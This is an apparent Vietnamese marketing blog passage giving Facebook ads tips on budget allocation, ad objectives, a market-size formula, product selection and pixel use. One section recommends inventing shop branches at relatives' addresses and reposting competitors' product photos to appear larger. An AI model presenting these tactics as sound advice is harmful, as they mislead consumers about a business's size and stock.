  Hoặc khi chúng ta nhân thêm nhiều nhóm nhằm mục đích tăng ngân sách => chồng chéo đối tượng và cạnh tranh giá thầu sẽ sớm xảy ra => đẩy tần suất hiển thị quảng cáo lên cao => giá quảng cáo mất kiểm soát. Đặc biệt, khi chia nhỏ nhóm + ngân sách, nhà quảng cáo khó đảm bảo việc chi tiêu chiến dịch theo đúng timeline của cả chiến dịch mình đặt ra lúc ban đầu.

  Tóm lại,

  đối với việc phân phối ngân sách theo nhóm. Sân chơi có vẻ bất lợi và đòi hỏi nhiều kỹ thuật phức tạp hơn với các cá mập muốn tiêu ngân sách siêu lớn. Còn những nhà quảng cáo chi tiêu với lượng ngân sách nhỏ thì dễ thở hơn vì như mình đã nói ở trên. Thường các cá mập ra đi trong 1 nốt nhạc khi cố tăng tiền vào nhóm quảng cáo mà mình cho rằng hiệu quả (hoặc nhân nhóm), nên slot quảng cáo vẫn còn đất cho những bạn có ngân sách nhỏ hơn bon tren và sinh tồn.

  Nhớ rằng, bản chất quảng cáo Facebook là tất cả các nhà quảng cáo cùng tranh cướp các slot trên feed của khách hàng, chứ ko phải ông ngân sách nhỏ thi đấu với ông nhỏ, ông lớn thi đấu với ông lớn.

  PHÂN PHỐI NGÂN SÁCH THEO CHIẾN DỊCH

  Với kiểu phân phối ngân sách theo chiến dịch các bạn sẽ thấy được bước thay đổi cực mạnh đối với những NQC trên Facebook ads. Khi áp dụng việc này đồng nghĩa với việc Facebook sẽ phải thay đổi một số rule quan trọng cơ bản:

  – Tiến trình máy học sẽ được áp dụng trên cả chiến dịch thay vì trên từng nhóm riêng biệt

  – Giảm chi tiêu ngân sách cho các nhóm kém hiệu quả, tập trung ngân sách cho các nhóm tốt. Nói cách khác là những nhóm có tỷ lệ chồng chéo cao => hiệu quả kém sẽ ít được phân phối hơn.

  – Đối với nhiều nhóm mục tiêu khác nhau trong cùng 1 chiến dịch, tiến trình máy học sẽ có cơ hội tìm được nhiều cơ hội phân phối với chi phí thấp hơn.

  Nhược điểm:

  Khi tiến trình máy học diễn ra trên cả chiến dịch, ngân sách được chạy vào các nhóm (nhóm khách hàng khác nhau) hiệu quả (giá thầu thấp hoặc ổn định hơn) Vậy thì câu hỏi đặt ra là, chắc gì những nhóm có bid thầu tốt đã có chỉ số chuyển đổi đơn hàng ngon ? =)) nhỡ nhóm có bid cao mới bán được hàng, nhóm bid thấp lại sml thì sao?

  Tóm lại:

  Các điều này đủ để chúng ta nhận ra rằng, thời kỳ của những siêu cá mập sắp ra đời. Hệ thống của Facebook sẽ hỗ trợ tốt hơn với những NQC có nhu cầu tiêu tiền quảng cáo siêu lớn. Dự đóan của chưởng môn là vào tháng 9 khi Facebook update toàn bộ các rule trên hệ thống ( bao gồm cả các chiến dịch mới và cũ ) thì trong tháng 9 giá quảng cáo sẽ có xu hướng giảm mạnh do phần lớn NQC cần 1 thời gian nhất định để tìm ra cách thức mới.

  Đến tháng 10 khi các cá mập trở lại, họ sẽ tiêu tiền bạo tay hơn làm mặt bằng chung bid thầu quảng cáo sẽ tăng ở mức cao kỷ lục. Những chú cá nhỏ sẽ khó sống hơn trong cuộc chơi mới này !

  Kỹ thuât: Tối ưu cho phân phối ngân sách theo chiến dịch

  Ngữ cảnh là chưởng môn đã có 1 camp test ngân sách nhỏ max chỉ số, tôi muốn tăng ngân sách lên x10. Và như đã phân tích ở trên, Facebook đã làm phần lớn công việc tối ưu giúp tôi, lúc này việc tôi cần phải làm chỉ là đo lường chỉ số chuyển đổi đơn hàng nhằm chọn ra target tốt nhất + khống chế ngân sách gây lỗ đối với NQC.

  Để đo được chỉ số chuyển đổi của 1 target chính xác nhất, tôi sẽ lên 3 chiến dịch với 3 line target khác nhau x 20 nhóm (nhân nhóm mỏi tay deck sợ nữa rồi vì Facebook nó sẽ tự loại các nhóm chồng chéo cao đi ) ===> Theo dõi chiến dịch nào có tỷ lệ chuyển đổi cao thì giữ, off chiến dịch chuyển đổi kém

  Khống chế ngân sách gây lỗ, trong phần chiến lược giá thầu mỗi chiến dịch tôi chọn chi phí thấp nhất với giới hạn giá thầu => nhân ra 20 nhóm chúng ta sẽ điền 1 range có 20 bid thầu kỳ vọng giao động trong khoảng lãi chúng ta CÓ LÃI và chấp nhận đc. Done

 • Chọn Tương tác, Messenger hay Chuyển đổi Web?

  Nhiều khi chúng ta bắt đầu lên 1 camp mới, chúng ta lại tự hỏi chạy kiểu gì cho hiệu quả nhỉ? =))) Không chỉ người mới, có nhiều bạn tiêu hàng tỷ tiền quảng cáo, lúc chạy kiểu này hiệu quả, lúc chạy kiểu khác hiệu quả. Nên cứ loay hoay mỗi lần set camp mới, ko biết mình nên chọn kiểu gì ?

  Trong bài này, chưởng môn sẽ chia sẻ cho các bạn cách tư duy làm sao để chọn kiểu chạy PHÙ HỢP với sản phẩm + hệ thống của bạn nhất sao cho hiệu quả nhé.

  Ok theo chưởng môn ?

  Trước tiên chúng ta cần xét 4 yếu tố sản phẩm:

  Phân khúc giá:

  Thấp (dưới 200k), Trung( 200 – 500k), Cao ( >500 ), Siêu cao cấp ( vài chục, vài trăm triệu hoặc ko có giá )

  Vòng đời sản phẩm:

  1 lần, vài lần, cả đời

  Cần tư vấn:

  không, có

  ⁃ Yếu tố xây thương hiệu:

  không, có

  ? Chú ý: Quan điểm của chưởng môn là không bán lãi thấp, nên mặc định các sản phẩm lãi ít nhất x2,5 lần trở lên nhé

  Chạy tương tác khi sản phẩm:

  + giá thấp, trung

  + thường là bán 1 lần

  + không cần tư vấn bán hàng

  + ko có yếu tố xây thương hiệu. Mục đích duy nhất là bán hàng

  ?Nội dung bài quảng cáo ngắn gọn, đầy đủ thông tin sp, ct khuyến mãi, có thể kêu gọi chốt đơn ngay trên bài post để giảm tải cho vận hành.

  Chạy messenger khi sản phẩm:

  + giá trung, cao

  + bán vài lần

  + Cần tư vấn kỹ càng

  + có yếu tố thương hiệu

  ? Nội dung bài quảng cáo chỉ cần cuốn hút, có cảm xúc yếu tố bán hàng chỉ là phụ. Điều hướng khách hàng vào mess để tư vấn kỹ hơn, remarketing dễ dàng hơn.

  Chạy chuyển đổi khi sản phẩm:

  + giá trung, cao, siêu cao

  + bán vài lần hoặc cả đời

  + có hoặc ko cần tư vấn

  + có yếu tố thương hiệu.

  ? Nội dung bài quảng cáo phải có cảm xúc cực mạnh, không cần yếu tố push sale ( đẩy về web thòng sau ). Càng tự nhiên, càng xúc động càng viral càng tốt.

  Đây là cách tư duy phân tích thông thường mà chưởng môn hay áp dụng, khi phân vân phải chọn kiểu quảng cáo nào. Tuy nhiên để có hiệu quả tốt nhất, các bạn nên áp dụng linh hoạt. Có thể mix các kiểu lên camp khác nhau cho cùng 1 dạng sản phẩm, nhằm đem lại giá trị tối ưu nhất khi chúng ta chạy quảng cáo. Chúc các bạn một mùa sale cuối năm bội thu và thịnh vượng ????\

 • Dành cho cá mập: Công thức tính độ lớn thị trường by Chấp ALL Thầy

  Chắc các shark chạy ads thường có câu hỏi dạng: Ơ sản phẩm này của mình ngon vãi nhái, liệu max 1 ngày mình sẽ…bán được bao nhiêu đơn nhỉ?

  Và liệu tổng khối lượng thị trường này bán được… bao nhiêu vạn đơn ???? =)))

  Ok ez thôi, các bạn chỉ cần theo công thức cực đơn giản bên dưới của chưởng môn là có thể chuẩn bị tâm lý để 1 tuần đổi xe, 1 tháng mua nhà roài ?

  Mối quan hệ giữa volume khách hàng và nhu cầu tức thời được hiểu như sau:

  Giả thiết sau khi chạy camp 3 ngày ngân sách vài triệu / ngày khá thành công, thị trường chưa kịp có cạnh tranh, Sharker có lợi nhuận > 50% và thu về chỉ số quân bình sau:

  ⁃ Điểm phù hợp 10

  ⁃ ctr 10% KH click vào bài

  ⁃ Từ đó 3% phát sinh thông tin KH ( ra inbox hoặc bl)

  ⁃ Cr 30% chuyển đổi đơn

  ??Chúng ta có công thức:

  Volume target x 80% ( TRỪ CLONE + KH rác ) x 10% x10% x 30% = Max đơn có thể vit / ngày X số ngày tính toán để reach full volume = Độ lớn thị trường của sản phẩm

  ? Ví dụ cụ thể trên một volume target 2 triệu set ngân sách chạy 10 ngày full tệp

  2tr x 80% x 10% x 3% x 30% = Max 1.440 đơn / 1 ngày x 10 ngày = 14.400 đơn ( cộng trừ thêm 10% do yếu tố cuối tháng + đầu tháng + nghỉ lễ ) 12.960 ~ 15.840 là khối lượng thị trường có khả năng sẽ đáp ứng sản phẩm của bạn ka ka

  Nhìn sướng nhỉ, tất nhiên ko có chuyện chính xác tuyệt đối. Nhưng nếu bạn đã học lớp Max Facebook Ads – MFA của chưởng môn thì đây là chuyện hoàn toàn khả thi, mà đôi khi còn tốt hơn nữa ?

  Chú ý quan trọng

  Rằng số liệu market size này sẽ giảm dần đều khi tần suất quay vòng của chu kì phủ full reach tăng lên. Nói cách khác dễ hiểu là cứ sau 1 vòng bạn chạy full hết tệp, market size ( nhu cầu khách ) sẽ càng nhỏ đi làm chỉ số CR sẽ giảm dần đều. Ngoại trừ 1 số sản phẩm bán ngày qua ngày, bán được lại nhiều lần cho 1 khách.

 • Kinh doanh trên Facebook: 3 hiểu nhầm ngu ngok các thầy hay dạy và thuốc

  3 HIỂU NHẦM

  1. Chạy camp test sản phẩm, ok bán được là nhập hàng ồ ạt về bán

  2. Cạnh tranh bằng: Chụp Ảnh sp sao cho đẹp, viết nội dung cho đúng mẫu, bid giá bán rẻ hơn đối thủ.

  3. Dạy đủ tut trick để bình luận inbox sao cho rẻ, rồi đéo ra đơn, ngu ngok =))

  Cực dễ nhận thấy các bạn nào mắc phải 3 bệnh này thường là đã từng đi học 3 kiểu thầy sau đây:

  1. Thầy cao thủ không bằng tranh thủ: đi học mót kiến thức khắp nơi, rồi về rồi dạy học viên chém gió giống thầy

  2. Thầy đa cấp: Mở lớp để học viên bán hàng cho thầy, làm giàu cho thầy, lỗ học viên đi mà chịu?

  3. Thầy phông ảnh: khoe suốt ngày, khoe mệt đéo chịu được nữa vẫn khoe. Đủ thứ từ học viên abc ( học viên chưa học đã top cmnr), khoe xe, khe nhà, khoe quan hệ các kiểu để tạo fame, trong khi kiến thức chuyên môn..z..z. Nói tên ra dân trong ngành Marketing online chỉ cười ?

  Và bên dưới là 3 BÀI THUỐC

  Từ chưởng môn để chữa 3 bệnh NGÁO cho các thầy cũng là cho các bạn nhé =)))

  1.Camp test nói lên điều gì?

  Camp test chẳng nói lên điều gì nếu các bạn chỉ nhìn vào giá bình luận. Thường khi bạn tiêu ngân sách nhỏ rất dễ có lãi, và khốn nạn ở chỗ khi các bạn ôm mớ hàng về xong tăng ngân sách lên thì giá bình luận x3 và bạn vỡ mồm một cách ngu ngok ?.

  Các thầy chỉ nói chạy test bán được hàng giá comment rẻ thì auto nhập về bán, ô hay dễ thế thì cờ hó nó cũng bán hàng online được =)) Để đánh giá 1 camp có thể vit ngân sách hay không? Và tăng đến đâu, từ đấy đánh giá đc số lượng hạng cần ôm về.

  Các bạn cần đánh giá bao quát trên nhiều chỉ số khác nhau: CTR, CPM, ĐPH, GIÁ BL, TIN NHẮN, CR…V.VV Cụ thể xem thêm: https://longhn.com/chien-luoc-x10-x20-ngan-sach-quang-cao-ma-khong-bi-sml-429.html

  2.Cạnh tranh trên Facebook:

  Kinh doanh trên Facebook là không có cạnh tranh, các bạn dễ tìm được 1 bạn rút điện thoại chụp sản phẩm chạy ads rùi giàu vãi đái. Còn mấy chú làm chuyên nghiệp hoặc cố tỏ ra chuyên nghiệp bay mầu nhiều không kể hết ?

  Tại sao à ? Dễ hiểu thôi, vấn đề nằm ở KIỂU QUẢNG CÁO ví dụ ở google khách có thể click 3 4 kết quảng cáo để chọn mua người bán rẻ nhất. Trên Facebook thì khác, kiểu quảng cáo của Facebook là kiểu quảng cáo gợi ý.

  Vậy nên cuộc chơi chủ yếu ở khống chế chỉ số + tiêu tiền ngân sách to phủ nhanh thì thắng.

  Ví dụ khác, bạn có cửa hàng ở phố X đột nhiên 1 ngày đối thủ của bạn mở cửa hàng ngay cạnh to gấp 10. Tỷ lệ bạn ra đi sớm thì muộn là rất cao, trên Facebook thì khác hoàn toàn. Đối thủ của bạn có 10 tỷ, bạn có 1 tỷ và bạn tiêu tiền nhanh hơn thì nó cũng chả là cái đinh gì cả =)))

  3.Dùng tut trick nhà quê để ép giá bình luận.

  Tôi đã từng dạy rất nhiều học viên, đi học các nơi và học được mấy trick để ép giá bình luận hay tin nhắn kiểu: không để giá, chấm để được báo giá, chạy target trẻ thôi, để lại 2 số cuối sđt để quay trúng thưởng…v..v.. và mẩy mẩy.

  Khi các bạn dùng các trick này, giá bình luận + tương tác tụt siêu rẻ. Nhưng nó chỉ có lợi trên màn hình, còn thực tế các bạn đang hành động cực kỳ ngu ngốc: Thứ nhất các bạn LÃNG PHÍ tài nguyên vận hành, tỷ lệ chuyển đổi đơn hàng của bạn thấp thảm thương.

  Thứ 2 vì chỉ số lúc nào cũng đẹp nên các bạn ko thể biết mình sai ở đâu. Thứ 3 là sau này chạy remarketing hiệu quả cực xịt vì toàn tệp khách hàng rác.

 • 4 Công thức chọn sản phẩm bán trên phây búc: VỐN NHỎ – Đa dạng mẫu hay ít mẫu ?

  Tôi thấy các team mới kinh doanh trên phây búc đa phần gặp phải lỗi kiểu này. Muốn thật đa dạng mẫu để khách hàng được nhiều lựa chọn hòng bán được nhiều hơn, nhưng lại sợ hàng tồn ( đặc biệt hàng thời trang hay bị hụt hơi vốn vì hàng tồn lắm).

  Vậy nên chỉ nhập vài mẫu ít ít về bán thử xem như thế nào đã =)) đương nhiên chỉ thử, thì đa phần không đi về đâu.

  Ngoài ra một số thầy dạy chạy phây búc với sự ngu lòn của mình thì hay xui học viên đi buôn hàng trend, tăng ngân sách lên, nhập thêm nhiều mẫu vào =)) để rùi học viên sml thì tự đi mà chịu, lãi mua xe thì nhanh để thầy khoe ?

  Vậy bạn phải lựa chọn sản phẩm như thế nào ? Công thức nào giúp bạn lựa chọn hàng bán trên phây búc có lợi nhất ? Tôi sẽ viết theo thứ tự lựa chọn công thức ưu tiên, và với giả định rằng mình chỉ có vốn nhỏ khoảng 50tr để kinh doanh trên phây búc.

  Các định nghĩa và chú thích quan trọng

  ⁃ Sản phẩm giá rẻ dưới 199k, trên 200k/ 1sp là giá trung, trên 500k là sp giá cao

  ⁃ Không bao giờ nhập 1 turn hàng > 30% số vốn mình có

  ⁃ Chọn ưu tiên sản phẩm giá bán cao % lãi cao –> Sản phẩm bán rẻ % lãi cao —> ko nên chọn sp đắt % lãi thấp hoặc phân khúc giá tầm trung

  ⁃ Bán hàng đừng quên nhắc đến thương hiệu dù là nhỏ. Lúc nào cũng phải gắn với tên mình hoặc brand, có thêm cảm xúc thì càng tốt.

  ⁃ Ít tiền nên bán các sp bán ngày qua ngày được, tránh trend.

  Ok, cùng xem bản thân mình nên chọn công thức nào dưới đây các bạn nhé:

  CÔNG THỨC SỐ 1: KẾT HỢP KINH DOANH ( khuyên dùng)

  Khi bạn mới tập tọe làm kinh doanh online, khôn ngoan nhất là tham gia một đội nhóm đang đi, hoặc xin kết hợp với 1 người bạn đang kinh doanh sản phẩm cụ thể ổn định. Việc này sẽ giúp bạn tiết kiệm đc rất nhiều thời gian và tiền bạc cho học phí ngu.

  Có một câu ngạn ngữ cổ: ” Muốn đi buôn muối hãy đi theo người bán muối. Muốn đi buôn vàng hãy đi theo người bán vàng “

  CÔNG THỨC: Đảm bảo cho sự thành công trong việc kết hợp là chia lợi nhuận 3-7. Bạn hãy nhận 30% phần ít hơn và dành 70% cho người dẫn dắt bạn, ko ai có thể từ chối 1 lời đề nghị tốt.

  CÔNG THỨC SỐ 2: SPY – SHOP THẬT – SẢN PHẨM ẢO ( khuyên dùng)

  1. SHOP THẬT – BÁN HÀNG ONLINE:

  Sử dụng tất cả các location mà bạn có để tăng trust cho brand. TỐT NHẤT 3- 5 CHI NHÁNH Nhờ địa điểm nhà bạn thân, cô, dì, chú bác…v…v… Tất nhiên địa điểm này ko hề có hàng, mà khi khách nhỡ có đến thì … Mình xin lỗi rùi mời sang địa điểm chính ? dù sao tỷ lệ ít lắm vì mình… Bán hàng online mà.

  2. SẢN PHẨM ẢO – BÁN THẬT:

  Ví dụ page bạn chỉ có 10 mẫu sp, nhưng như thế thì page bán hàng của bạn nhìn lèo tèo, CÓ GÌ ĐẤY SAI SAI VỚI QUY MÔ 3 4 CỬA HÀNG. Lúc này bắt buộc bạn phải spy, vào 5 page bán cùng ngành có lượng tương tác tốt tốt ( đừng chọn thằng nào to quá vì nó sẽ chảnh) lấy mẫu từ các page khác đăng lên page của bạn với mức giá + thêm 10-25%. Hãy bắt đầu với tỷ lệ 1/4, nghĩa là cứ 4 sản phẩm thì có 1 sản phẩm là của bạn có sẵn.

  Khi bạn thấy những mẫu nào bán được thì nhập hàng về số lượng và đổ tổng lực ads vào các mẫu hot, đồng thời tăng tỷ lệ lên 1/3, cứ 3 sản phẩm thì có 1 sp là của bạn. Khi page của bạn đến tỷ lệ 1/2, bạn sống đã khá khỏe rồi đấy. Cố gắng đến khi 100% sp trên page là của bạn, thì chúc mừng bạn hệ thống của bạn đã đi vào ổn định

  Tip: bạn có thể chia sẻ thẳng thắn với chủ các shop chuyện này để xin làm cộng tác viên. Và nếu tin tưởng đc bạn có thể đặt cọc 1 khoản cố định vài triệu, khi có khách thì chuyển địa chỉ khách nhờ shop thu hộ 10%-25%.

  CÔNG THỨC SỐ 3: 1 DUY NHẤT, TOP NGÁCH ( làm khi bạn có kỹ năng marketing )

  Nếu bạn tìm được 1 dòng sản phẩm mà chưa có ai làm lead. Hãy nắm thật chắc, làm brand, kể những câu chuyện và đưa cảm xúc vào sản phẩm của bạn. Tạo ra sự ghi nhớ tuyệt đối trong sản phẩm ngách mà bạn đánh. Làm top thì rõ ràng phân khúc là cao cấp, ko cần nhiều sản phẩm. Không cần bán số lượng mà tập trung vào giá trị khách hàng, chất lượng sản phẩm, thỏa mãn khách hàng.

  Ví dụ: Năm 2015, tôi là người bán vòng phong thủy online đầu tiên ở Việt Nam. Tôi đào tạo khách hàng qua việc chia sẻ, cho đi kiến thức về các loại chất liệu quý hiếm như gỗ sưa, ngọc, ngà voi và coi nó là THÚ CHƠI. Đồng thời tagline để mọi người nhận diện là VUA VÒNG PHONG THỦY vohalo. Việc này rất mất thời gian, vài tháng là ít nhưng hiệu quả lâu dài, lợi nhuận cao.

  Công thức: KỂ CHUYỆN => HƯỚNG DẪN, CHIA SẺ CHO ĐI GIÁ TRỊ => TẠO NHU CẦU => BÁN HÀNG

  CÔNG THỨC SỐ 4: ĐÁNH TREND ( không khuyên dùng )

  Ai cũng tưởng đánh trend nhanh giàu + nó ngon ăn, chứ tôi thấy nếu bạn vốn nhỏ và trừ khi không còn vẹo gì nữa mới đi buôn hàng trend. Quá nhiều trap, quá nhiều rủi ro, short turn nên cần triển khai rất vũ bão ko phù hợp team ít người. Ngoạm cái xong té chỉ dành cho cá mập ? Team nào thực sự mạnh, max nhiều tiền hẵng nghĩ đánh trend.

  Tip: Có thể khéo léo kết hợp với công thức số 2 để đi buôn nước bọt ? như thế nào thì bạn tự nghĩ nhé =))

 • CÁC PHƯƠNG PHÁP TỐI ƯU QUẢNG CÁO

 • Tất tật về Pixel & Chuyển đổi trong quảng cáo Facebook

  Chào các bạn và quý vị, nhân một đêm nghe mấy ông em cãi nhau về pixel + chuyển đổi. Chưởng môn đã tìm lại tài liệu trước đây mình từng đọc và nghiên cứu để giải đáp cho mấy thanh niên MFA ham học. Nên tiện chưởng môn tổng kết lại thành bài này nhằm để các bạn mới được tiếp cận cùng học và nghiên cứu, trong bài này các bạn sẽ loại bỏ được một số kiến thức hoàn toàn sai về PIXEL mà đa phần chúng ta đi học hay nghe đâu đó trên mấy kênh thông tin không chính thống.

  Pixel và chuyển đổi trong Facebook Ads
  Pixel thôi mà đừng bốc phét

  Ví dụ: Pixel càng to càng hiệu quả, hoặc có càng nhiều sự kiện càng tốt, sự kiện tiêu chuẩn tốt hơn tùy chỉnh vân vân và mây mây =)) Nói thật là sức tưởng tượng của các thầy nó là vãi chưởng luôn ý các bạn ạ, vũ trụ cũng chịu thua. Okie học rồi nghe các thầy chém chỉ bik cười thôi nè, quẩy lên ka ka ka

  Cách tốt nhất để tăng doanh số trên trang web bằng Pixel

  Sau khi triển khai Facebook pixel, bạn có thể truy cập vào nhiều công cụ và kỹ thuật quảng cáo mới khác nhau. Một trong những công cụ/kỹ thuật mạnh nhất là tối ưu hóa nhóm quảng cáo cho chuyển đổi (“tối ưu hóa chuyển đổi”) để tăng doanh số trên trang web.

  Loạt hướng dẫn này cho bạn biết cách thực hiện việc này, từ xây dựng nền tảng để thành công đến tinh chỉnh chiến dịch của bạn nhằm đạt hiệu quả tối đa.

  Quan trọng: Đảm bảo pixel của bạn đang hoạt động đúng cách trước khi tiếp tục.

  Chọn hướng dẫn phù hợp

  Nên xác định cách tiếp cận để tăng doanh số trên trang web của bạn theo số hoạt động sẽ diễn ra trên trang web của bạn. Hãy tìm hiểu về điều này bằng cách kiểm tra số sự kiện pixel diễn ra trên trang web của bạn vào tháng trước. Sự kiện pixel xảy ra khi một người thực hiện hành động trên rang web của bạn (ví dụ: xem trang, thêm mặt hàng vào giỏ, hoàn tất giao dịch mua). Tìm hiểu cách kiểm tra hoạt động của pixel trong Trình quản lý sự kiện.

  Dưới đây là một vài số tiêu chuẩn để cho bạn biết ngữ cảnh và chỉ dẫn bạn đến hướng dẫn phù hợp:

  • Nếu có dưới 500 sự kiện pixel trên trang web của bạn vào tháng trước, thì bạn nên xây dựng dữ liệu và cơ sở khách hàng online trước khi bắt đầu sử dụng tối ưu hóa chuyển đổi. Hướng dẫn giới thiệu của chúng tôi cho bạn biết cách thực hiện điều đó.
  • Nếu có từ 500 đến 10.000 sự kiện pixel trên trang web của bạn trong tháng trước, thì bạn nên bắt đầu thử nghiệm với tối ưu hóa chuyển đổi và nhắm mục tiêu dựa trên ý định. Hướng dẫn trung cấp của chúng tôi cho bạn biết cách thực hiện việc đó.
  • Nếu trang web của bạn có hơn 10.000 sự kiện pixel trong tháng trước, thì bạn đã sẵn sàng để chuyển trọng tâm của chiến lược quảng cáo sang tối ưu hóa chuyển đổi. Hướng dẫn nâng cao của chúng tôi cho bạn biết cách tinh chỉnh và mở rộng chiến dịch của mình. Lưu ý rằng nếu bạn có nhiều sự kiện pixel hàng tháng như vậy nhưng trước đó chưa từng sử dụng tối ưu hóa chuyển đổi, thì bạn có thể bắt đầu với hướng dẫn trung cấp của chúng tôi khi tìm hiểu về cách hoạt động của tối ưu hóa chuyển đổi.

  Lưu ý: Số lượt kích hoạt pixel bạn nhìn thấy là thước đo tất cả các hoạt động trên trang web của bạn chứ không chỉ là hoạt động có được nhờ quảng cáo trên Facebook.

  Xem thêm: Khóa học quảng cáo Facebook chuyên sâu

  Chọn đúng hướng dẫn bằng cách nhấp vào liên kết thích hợp ở trên để bắt đầu. Với sự kiên nhẫn và sẵn sàng thử nghiệm và thay đổi tư duy, bạn có thể thành công.

  Hướng dẫn cơ bản: Tăng doanh số trên trang web bằng pixel

  Nếu bạn đã triển khai pixel và muốn tăng doanh số trên trang web nhưng chỉ nhận được dưới 100 sự kiện pixel hàng tháng thì đây chính là hướng dẫn dành cho bạn. Hướng dẫn này chỉ cho bạn cách xây dựng dữ liệu và cơ sở khách hàng online bạn cần để có thể bắt đầu tăng doanh số thông qua tối ưu hóa chuyển đổi.

  Nếu bạn đã có dữ liệu và cơ sở khách hàng cần thiết thì hãy đọc hướng dẫn trung cấp hoặc nâng cao.

  Thu hút lưu lượng truy cập để tăng doanh số

  Nếu không có đủ người truy cập trang web (thể hiện ở con số dưới 500 sự kiện pixel hàng tháng xảy ra trên đó) thì khả năng tăng doanh số là rất khó. Vì thế, để có thể tăng doanh số thì bạn phải thu hút mọi người truy cập trang web của mình. Khi đó, bạn có thể sử dụng dữ liệu pixel được tạo ra để tối ưu hóa chuyển đổi kịp thời.

  Bắt đầu chạy quảng cáo sử dụng mục tiêu marketing lưu lượng truy cập và được tối ưu hóa cho lượt xem trang đích. Điều này có thể thu hút mọi người truy cập trang web của bạn, từ đó tạo dữ liệu pixel và xây dựng cơ sở khách hàng.

  Tạo đối tượng mục tiêu phù hợp

  Để đạt được thành công thì việc nhắm mục tiêu quảng cáo đến đối tượng phù hợp là vô cùng quan trọng. Dưới đây là một số mẹo để thực hiện đúng:

  • Sử dụng Đối tượng tùy chỉnh từ file dữ liệu. Nếu có file dữ liệu chứa danh sách khách hàng hiện tại và thông tin của họ, bạn có thể tải file đó lên Facebook. Và chúng tôi sẽ cố gắng tìm những người đó và hiển thị quảng cáo của bạn cho họ. Đây là cách dễ nhất để tiếp cận khách hàng hiện tại, đặc biệt là những người có thể chưa tương tác online với doanh nghiệp của bạn.
  • Tiếp cận mọi người dựa trên thông tin nhân khẩu học của họ. Tạo đối tượng dựa trên thông tin nhân khẩu học cụ thể, nhưng không quá hạn chế. Nếu thông tin quá cụ thể, đối tượng có thể quá nhỏ nên không tìm được bất kỳ kết quả nào. Nếu thông tin quá rộng thì có thể dẫn đến nhiều kết quả rẻ mà lại vô nghĩa (ví dụ: những người nhấp vào quảng cáo nhưng không bao giờ mua bất cứ thứ gì trên trang web của bạn vì họ không thực sự muốn mua những gì bạn đang bán). Bạn nên trả nhiều hơn để nhận được kết quả có ý nghĩa thay vì trả ít hơn để nhận được kết quả vô nghĩa. (Kiểu nhắm mục tiêu này đặc biệt hữu ích nếu bạn không có file dữ liệu để sử dụng cho Đối tượng tùy chỉnh. Bạn cũng có thể tìm cách sử dụng cả hai cách này cùng một lúc trên các nhóm quảng cáo khác nhau để xem nhóm nào hiệu quả hơn – nhưng một lần nữa, bạn nên sử dụng cả hai cách trên cùng một nhóm quảng cáo.)Để tạo đối tượng hữu ích dựa trên thông tin nhân khẩu học, hãy tự hỏi mình những câu hỏi như:
   • Khách hàng của tôi ở đâu? Nếu bạn là doanh nghiệp địa phương hoặc chỉ có thể giao hàng đến những nơi nhất định, đừng nhắm mục tiêu toàn bộ quốc gia. Hãy nhắm mục tiêu khu vực địa phương của bạn hoặc các khu vực bạn có thể giao hàng.
   • Khách hàng của tôi là ai? Hãy suy nghĩ về những đặc điểm cơ bản chung của khách hàng. Liệu họ già hơn hay trẻ hơn? Họ có thể thuộc giới tính cụ thể nào? Họ có thể sống đâu?
   • Khách hàng của tôi nói ngôn ngữ nào? Facebook không dịch nội dung quảng cáo của bạn sang ngôn ngữ khác, vì vậy hãy đảm bảo đối tượng bạn đang nhắm mục tiêu có thể đọc quảng cáo của bạn bằng cách sử dụng các lựa chọn nhắm mục tiêu theo ngôn ngữ thích hợp.
   • Nếu tôi hiểu rõ hơn Facebook về một kiểu nhắm mục tiêu nhất định thì sao? Điều này có thể rất khó xác định trong mọi trường hợp, nhưng khi bạn nghĩ rằng mình có thông tin mà chúng tôi không có, bạn nên cung cấp thông tin đó thông qua nhắm mục tiêu nhằm giúp chúng tôi tìm những người phù hợp nhất để hiển thị quảng cáo của bạn. Nếu bạn không nghĩ rằng mình biết rõ hơn Facebook thì bạn không nên thêm thông tin đó vào tiêu chí nhắm mục tiêu của mình. Lưu ý rằng hệ thống phân phối của Facebook đang cố gắng hiển thị quảng cáo của bạn cho những người có nhiều khả năng mang lại cho bạn kết quả bạn đang tối ưu hóa nhất dù bạn nhắm mục tiêu rộng đến mức nào. Do đó, các lựa chọn nhắm mục tiêu thiếu thông tin gây hạn chế cho hệ thống phân phối của chúng tôi có thể sẽ gây ảnh hưởng tiêu cực đến hiệu quả hơn là tích cực.
   • Tôi có nên loại trừ tiêu chí một cách chiến lược không? Việc thêm các tiêu chí nhắm mục tiêu bổ sung rất hữu ích, nhưng cũng đừng bỏ qua khả năng loại trừ. Khi làm như vậy, bạn sẽ giúp chúng tôi nâng cao khả năng tìm kiếm những người phù hợp nhanh hơn.
   • Tôi có nên sử dụng Thông tin chi tiết về đối tượng làm hướng dẫn không? Nếu bạn thực sự không chắc nên nhắm mục tiêu ai nhưng cũng không muốn để hệ thống phân phối của Facebook quyết định vấn đề tối ưu hóa, hãy sử dụng Thông tin chi tiết về đối tượng. Công cụ này sẽ hiển thị cho bạn thông tin phù hợp về đối tượng mục tiêu, giúp bạn tinh chỉnh nhắm mục tiêu cũng như nội dung của mình.Nếu chỉ nhắm mục tiêu theo nhân khẩu học không mang lại hiệu quả thì hãy thử kết hợp cả nhắm mục tiêu chi tiết.

  Chọn chiến lược giá thầu phù hợp

  Một khó khăn khác đối với các nhà quảng cáo là chọn chiến lược giá thầu. Ở giai đoạn này, đối với hầu hết các nhà quảng cáo, chúng tôi khuyên dùng chiến lược giá thầu chi phí thấp nhất mà không có giới hạn giá thầu. Cách này sẽ giúp giữ mọi thứ đơn giản và dễ quản lý trong khi bạn xây dựng dữ liệu và tìm kiếm khách hàng.

  Bước tiếp theo

  Nếu áp dụng các chiến lược này thì cuối cùng, bạn sẽ nhận được ít nhất 500 sự kiện pixel mỗi tháng trên trang web của mình. Khi thực hiện, hãy đọc hướng dẫn trung cấp của chúng tôi về cách bắt đầu tối ưu hóa cho chuyển đổi.

  Hướng dẫn trung cấp: Tăng doanh số trên trang web bằng pixel

  Nếu bạn đã triển khai pixel, muốn tăng doanh số trên trang web và đang nhận từ 500 đến 10.000 sự kiện pixel hàng tháng thì đây chính là hướng dẫn dành cho bạn. Hướng dẫn này chỉ cho bạn cách bắt đầu thử nghiệm với tối ưu hóa chuyển đổi để tìm ra phương pháp tiếp cận phù hợp với mình trước khi nhân rộng chiến dịch của bạn.

